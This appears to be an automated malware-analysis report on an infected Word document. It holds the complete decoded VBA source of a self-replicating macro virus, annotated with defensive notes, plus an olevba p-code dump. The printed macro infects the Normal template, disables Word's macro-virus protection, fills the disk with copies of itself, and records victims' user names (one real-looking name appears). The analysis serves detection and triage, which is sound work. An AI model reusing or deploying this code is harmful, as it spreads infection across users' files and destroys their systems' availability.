MALICIOUS
220
Risk Score
Heuristics 4
-
ClamAV: Doc.Trojan.Marker-17 critical CLAMAV_DETECTION — ClamAV detected this file as malware: Doc.Trojan.Marker-17
-
VBA macros detected medium 1 related finding OLE_VBA_MACROS — Document contains VBA macro code
-
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION — VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature. Matched line in script:
Options.VirusProtection = False -
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC — OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas (SHA-256: 1cd95080a8cecdcd7309c4072fc7a4ececd4f331d0768134213e66f9c5e7dc13) | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10392 bytes |

Detection — ClamAV: Doc.Trojan.Marker-17. Obfuscation or payload: unlikely.
Preview script — first 1,000 lines of the extracted script
' Analyst annotation: standard attribute header of the ThisDocument class module as
' decoded by olevba. The code is left unchanged; only comments are added.
' NOTE(review): the report's OLE_LEGACY_WORDBASIC_AUTOEXEC finding says no modern VBA
' project was recovered, yet this decoded module is that project — the finding looks
' like it was evaluated before extraction; worth confirming in the analyzer.
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' The four comment stanzas below (user name, initials, blank address line, timestamp,
' blank line) have exactly the shape of the Ninfec string that Document_Close builds
' from Application.UserName / UserInitials / UserAddress / Now() and prepends to the
' module on each replication. They are consistent with four replication events on a
' machine whose Word user name was "Shane Coursen" (initials "SC"), on 24 Jan 2001 and
' 17 May 2001 — a propagation trail, and a leak of the victim's Word identity into
' every infected file. Useful as a triage fingerprint; treat the dates as untrusted.
' Shane Coursen
' SC
'
' 5/17/01 11:04:33 AM
'
' Shane Coursen
' SC
'
' 5/17/01 11:04:20 AM
'
' Shane Coursen
' SC
'
' 1/24/2001 10:19:11 AM
'
' Shane Coursen
' SC
'
' 1/24/2001 10:18:58 AM
'
' Analyst annotation (defender notes; the code itself is unchanged).
' Document_Close fires when the document is closed, so the routine runs with no user
' interaction beyond closing the file. Observed behaviour, in order:
'   1. copies this module between ActiveDocument and the global template
'      (NormalTemplate) through the VBE object model (CodeModule.AddFromString) —
'      self-replication via the template;
'   2. turns off Word's macro-virus warning (Options.VirusProtection = False);
'   3. after June of any year >= 2000, loops SaveAs into C:\Windows\ creating files
'      named AA<n>AA.DOC until the loop bound or the disk gives out.
' Every error is swallowed by On Error Resume Next, so partial failures are silent.
Private Sub Document_Close()
On Error Resume Next
' Only .doc / .dot targets — the VBProject copy below needs a format that keeps macros.
If ActiveDocument.SaveFormat = wdFormatDocument Or ActiveDocument.SaveFormat = wdFormatTemplate Then
' Infection marker. Because this Const line lives in the module itself, CodeModule.Find
' for this text succeeds in any module that already carries this code. The literal is
' a convenient hunting string for the family.
Const exi = "la macro de colombia"
' `planinfec` is declared but never read; the checks below use the undeclared Variant
' `Plainfec` (there is no Option Explicit), so the template flag is a Variant.
Dim DInfec, planinfec As Boolean
Dim Docu, Plan As Object
Dim modulin, contemodu, Ninfec As String
Dim Nume As Integer
Dim Copform As Object
' First VBComponent of the active document and of the global template — the two
' infection sites.
Set Docu = ActiveDocument.VBProject.VBComponents.Item(1)
Set Plan = NormalTemplate.VBProject.VBComponents.Item(1)
' Snapshot of the "no unsaved changes" flags, taken before the VBProject is modified.
' Saveplan is captured but never read.
SaveDoc = ActiveDocument.Saved
Saveplan = NormalTemplate.Saved
' Marker search over lines 1..40000 of each module: is the document / the template
' already infected?
DInfec = Docu.codemodule.Find(exi, 1, 1, 40000, 40000)
Plainfec = Plan.codemodule.Find(exi, 1, 1, 40000, 40000)
' Generation stamp: four comment lines holding the victim's Word user name, initials,
' address and the current time. Each replication prepends one such stanza, so an
' infected module carries a trail of the machines it passed through (and leaks their
' user details into every file it infects). The stanzas at the top of this module are
' exactly this format.
Ninfec = "'" & " " & Application.UserName & Chr(13) & "'" & " " & Application.UserInitials & Chr(13) & "'" & " " & Application.UserAddress & Chr(13) & "'" & " " & Now() & Chr(13) & "'" & " "
' AV tampering: disables Word's built-in macro-virus warning (the line matched by the
' OLE_VBA_MACRO_VIRUS_REPLICATION heuristic in the report).
Options.VirusProtection = False
' Nume becomes a single digit 0-9 (Int(Rnd()*10), first character); Nume = Nume is a no-op.
Nume = Mid(Int(Rnd() * 10), 1, 1)
Nume = Nume
nume1 = 7
' Replicate whenever the template is clean; otherwise only on the roughly 1-in-10
' draw of 7, which throttles template-to-document spread.
If Nume = nume1 Or Plainfec = False Then
' Document infected, template clean -> stamp and copy the whole module into the template.
If DInfec = True And Plainfec = False Then
Docu.codemodule.addfromstring Ninfec
contemodu = Docu.codemodule.Lines(1, Docu.codemodule.CountOfLines)
Plan.codemodule.addfromstring contemodu
End If
' Template infected, document clean -> stamp and copy from the template into the document.
If DInfec = False And Plainfec = True Then
Plan.codemodule.addfromstring Ninfec
contemodu = Plan.codemodule.Lines(1, Plan.codemodule.CountOfLines)
Docu.codemodule.addfromstring contemodu
End If
' Both saves are gated on the document's flag (Saveplan is unused) and write the
' injected code to disk. The global template being saved on document close is a
' detection opportunity (template modification time / VBA project hash change).
If SaveDoc = True Then ThisDocument.Save
If SaveDoc = True Then NormalTemplate.Save
End If
End If
' sd is built and trimmed but never used; the date gate below re-evaluates Now().
sd = Day(Now()) & "-" & Month(Now()) & "-" & Year(Now())
sd = Trim(sd)
' Payload trigger: July-December of any year from 2000 on.
If Year(Now()) >= 2000 And Month(Now()) > 6 Then
' Payload: repeatedly SaveAs the active document into C:\Windows\ as AA1AA.DOC,
' AA2AA.DOC, ... for up to 999,999,991 iterations — a disk-filling denial of service.
' Each copy is written as wdFormatDocument, a format that preserves macros.
' Indicator: a burst of files matching C:\Windows\AA*AA.DOC at document close.
ChangeFileOpenDirectory "C:\Windows\"
For i = 1 To 999999991
ActiveDocument.SaveAs FileName:=("AA" & i & "AA.DOC"), FileFormat:= _
wdFormatDocument, LockComments:=False, Password:="", AddToRecentFiles:= _
True, WritePassword:="", ReadOnlyRecommended:=False, EmbedTrueTypeFonts:= _
False, SaveNativePictureFormat:=False, SaveFormsData:=False, _
SaveAsAOCELetter:=False
Next
End If
End Sub
' Processing file: /opt/analyzer/scan_staging/466b63f722bf4b708222d1b2a3cb5c3b.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 5466 bytes
' Line #0:
' QuoteRem 0x0000 0x000E " Shane Coursen"
' Line #1:
' QuoteRem 0x0000 0x0003 " SC"
' Line #2:
' QuoteRem 0x0000 0x0000 ""
' Line #3:
' QuoteRem 0x0000 0x0014 " 5/17/01 11:04:33 AM"
' Line #4:
' QuoteRem 0x0000 0x0000 ""
' Line #5:
' QuoteRem 0x0000 0x000E " Shane Coursen"
' Line #6:
' QuoteRem 0x0000 0x0003 " SC"
' Line #7:
' QuoteRem 0x0000 0x0000 ""
' Line #8:
' QuoteRem 0x0000 0x0014 " 5/17/01 11:04:20 AM"
' Line #9:
' QuoteRem 0x0000 0x0000 ""
' Line #10:
' QuoteRem 0x0000 0x000E " Shane Coursen"
' Line #11:
' QuoteRem 0x0000 0x0003 " SC"
' Line #12:
' QuoteRem 0x0000 0x0000 ""
' Line #13:
' QuoteRem 0x0000 0x0016 " 1/24/2001 10:19:11 AM"
' Line #14:
' QuoteRem 0x0000 0x0000 ""
' Line #15:
' QuoteRem 0x0000 0x000E " Shane Coursen"
' Line #16:
' QuoteRem 0x0000 0x0003 " SC"
' Line #17:
' QuoteRem 0x0000 0x0000 ""
' Line #18:
' QuoteRem 0x0000 0x0016 " 1/24/2001 10:18:58 AM"
' Line #19:
' QuoteRem 0x0000 0x0000 ""
' Line #20:
' FuncDefn (Private Sub Document_Close())
' Line #21:
' Line #22:
' OnError (Resume Next)
' Line #23:
' Ld ActiveDocument
' MemLd SaveFormat
' Ld wdFormatDocument
' Eq
' Ld ActiveDocument
' MemLd SaveFormat
' Ld wdFormatTemplate
' Eq
' Or
' IfBlock
' Line #24:
' Dim (Const)
' LitStr 0x0014 "la macro de colombia"
' VarDefn exi
' Line #25:
' Dim
' VarDefn DInfec
' VarDefn planinfec (As Boolean)
' Line #26:
' Dim
' VarDefn Docu
' VarDefn Plan (As Object)
' Line #27:
' Dim
' VarDefn modulin
' VarDefn contemodu
' VarDefn Ninfec (As String)
' Line #28:
' Dim
' VarDefn Nume (As Integer)
' Line #29:
' Dim
' VarDefn Copform (As Object)
' Line #30:
' Line #31:
' SetStmt
' LitDI2 0x0001
' Ld ActiveDocument
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' Set Docu
' Line #32:
' SetStmt
' LitDI2 0x0001
' Ld NormalTemplate
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' Set Plan
' Line #33:
' Line #34:
' Ld ActiveDocument
' MemLd Saved
' St SaveDoc
' Line #35:
' Ld NormalTemplate
' MemLd Saved
' St Saveplan
' Line #36:
' Line #37:
' Ld exi
' LitDI2 0x0001
' LitDI2 0x0001
' LitDI4 0x9C40 0x0000
' LitDI4 0x9C40 0x0000
' Ld Docu
' MemLd codemodule
' ArgsMemLd Find 0x0005
' St DInfec
' Line #38:
' Ld exi
' LitDI2 0x0001
' LitDI2 0x0001
' LitDI4 0x9C40 0x0000
' LitDI4 0x9C40 0x0000
' Ld Plan
' MemLd codemodule
' ArgsMemLd Find 0x0005
' St Plainfec
' Line #39:
' Line #40:
' LitStr 0x0001 "'"
' LitStr 0x0001 " "
' Concat
' Ld Application
' MemLd UserName
' Concat
' LitDI2 0x000D
' ArgsLd Chr 0x0001
' Concat
' LitStr 0x0001 "'"
' Concat
' LitStr 0x0001 " "
' Concat
' Ld Application
' MemLd UserInitials
' Concat
' LitDI2 0x000D
' ArgsLd Chr 0x0001
' Concat
' LitStr 0x0001 "'"
' Concat
' LitStr 0x0001 " "
' Concat
' Ld Application
' MemLd UserAddress
' Concat
' LitDI2 0x000D
' ArgsLd Chr 0x0001
' Concat
' LitStr 0x0001 "'"
' Concat
' LitStr 0x0001 " "
' Concat
' ArgsLd Now 0x0000
' Concat
' LitDI2 0x000D
' ArgsLd Chr 0x0001
' Concat
' LitStr 0x0001 "'"
' Concat
' LitStr 0x0001 " "
' Concat
' St Ninfec
' Line #41:
' Line #42:
' LitVarSpecial (False)
' Ld Options
' MemSt VirusProtection
' Line #43:
' Line #44:
' ArgsLd Rnd 0x0000
' LitDI2 0x000A
' Mul
' FnInt
' LitDI2 0x0001
' LitDI2 0x0001
' ArgsLd Mid$ 0x0003
' St Nume
' Line #45:
' Ld Nume
' St Nume
' Line #46:
' LitDI2 0x0007
' St nume1
' Line #47:
' Ld Nume
' Ld nume1
' Eq
' Ld Plainfec
' LitVarSpecial (False)
' Eq
' Or
' IfBlock
' Line #48:
' Line #49:
' Ld DInfec
' LitVarSpecial (True)
' Eq
' Ld Plainfec
' LitVarSpecial (False)
' Eq
' And
' IfBlock
' Line #50:
' Ld Ninfec
' Ld Docu
' MemLd codemodule
' ArgsMemCall addfromstring 0x0001
' Line #51:
' LitDI2 0x0001
' Ld Docu
' MemLd codemodule
' MemLd CountOfLines
' Ld Docu
' MemLd codemodule
' ArgsMemLd Lines 0x0002
' St contemodu
' Line #52:
' Ld contemodu
' Ld Plan
' MemLd codemodule
' ArgsMemCall addfromstring 0x0001
' Line #53:
' EndIfBlock
' Line #54:
' Line #55:
' Ld DInfec
' LitVarSpecial (False)
' Eq
' Ld Plainfec
' LitVarSpecial (True)
' Eq
' And
' IfBlock
' Line #56:
' Ld Ninfec
' Ld Plan
' MemLd codemodule
' ArgsMemCall addfromstring 0x0001
' Line #57:
' LitDI2 0x0001
' Ld Plan
' MemLd codemodule
' MemLd CountOfLines
' Ld Plan
' MemLd codemodule
' ArgsMemLd Lines 0x0002
' St contemodu
' Line #58:
' Ld contemodu
' Ld Docu
' MemLd codemodule
' ArgsMemCall addfromstring 0x0001
' Line #59:
' EndIfBlock
' Line #60:
' Line #61:
' Line #62:
' Line #63:
' Ld SaveDoc
' LitVarSpecial (True)
' Eq
' If
' BoSImplicit
' Ld ThisDocument
' ArgsMemCall Save 0x0000
' EndIf
' Line #64:
' Ld SaveDoc
' LitVarSpecial (True)
' Eq
' If
' BoSImplicit
' Ld NormalTemplate
' ArgsMemCall Save 0x0000
' EndIf
' Line #65:
' EndIfBlock
' Line #66:
' EndIfBlock
' Line #67:
' ArgsLd Now 0x0000
' ArgsLd Day 0x0001
' LitStr 0x0001 "-"
' Concat
' ArgsLd Now 0x0000
' ArgsLd Month 0x0001
' Concat
' LitStr 0x0001 "-"
' Concat
' ArgsLd Now 0x0000
' ArgsLd Year 0x0001
' Concat
' St sd
' Line #68:
' Ld sd
' ArgsLd Trim 0x0001
' St sd
' Line #69:
' ArgsLd Now 0x0000
' ArgsLd Year 0x0001
' LitDI2 0x07D0
' Ge
' ArgsLd Now 0x0000
' ArgsLd Month 0x0001
' LitDI2 0x0006
' Gt
' And
' IfBlock
' Line #70:
' LitStr 0x000B "C:\Windows\"
' ArgsCall ChangeFileOpenDirectory 0x0001
' Line #71:
' StartForVariable
' Ld i
' EndForVariable
' LitDI2 0x0001
' LitDI4 0xC9F7 0x3B9A
' For
' Line #72:
' LineCont 0x0010 0F 00 08 00 1B 00 08 00 27 00 08 00 31 00 08 00
' LitStr 0x0002 "AA"
' Ld i
' Concat
' LitStr 0x0006 "AA.DOC"
' Concat
' Paren
' ParamNamed FileName
' Ld wdFormatDocument
' ParamNamed FileFormat
' LitVarSpecial (False)
' ParamNamed LockComments
' LitStr 0x0000 ""
' ParamNamed Password
' LitVarSpecial (True)
' ParamNamed AddToRecentFiles
' LitStr 0x0000 ""
' ParamNamed WritePassword
' LitVarSpecial (False)
' ParamNamed ReadOnlyRecommended
' LitVarSpecial (False)
' ParamNamed EmbedTrueTypeFonts
' LitVarSpecial (False)
' ParamNamed SaveNativePictureFormat
' LitVarSpecial (False)
' ParamNamed SaveFormsData
' LitVarSpecial (False)
' ParamNamed SaveAsAOCELetter
' Ld ActiveDocument
' ArgsMemCall SaveAs 0x000B
' Line #73:
' StartForVariable
' Next
' Line #74:
' EndIfBlock
' Line #75:
' Line #76:
' EndSub
' Line #77:
' Line #78:
' Line #79:
' Line #80:
' Line #81:
' Line #82:
' Line #83:
' Line #84:
' Line #85:
' Line #86:
' Line #87:
' Line #88:
' Line #89:
' Line #90:
' Line #91:
' Line #92:
' Line #93:
' Line #94:
' Line #95:
' Line #96:
' Line #97:
' Line #98:
' Line #99:
' Line #100:
' Line #101:
' Line #102:
' Line #103:
' Line #104:
' Line #105:
' Line #106:
' Line #107:
' Line #108:
' Line #109:
' Line #110:
' Line #111:
' Line #112:
' Line #113:
' Line #114:
' Line #115:
' Line #116:
' Line #117:
' Line #118:
' Line #119:
' Line #120:
' Line #121:
' Line #122:
' Line #123:
' Line #124:
' Line #125:
|
|||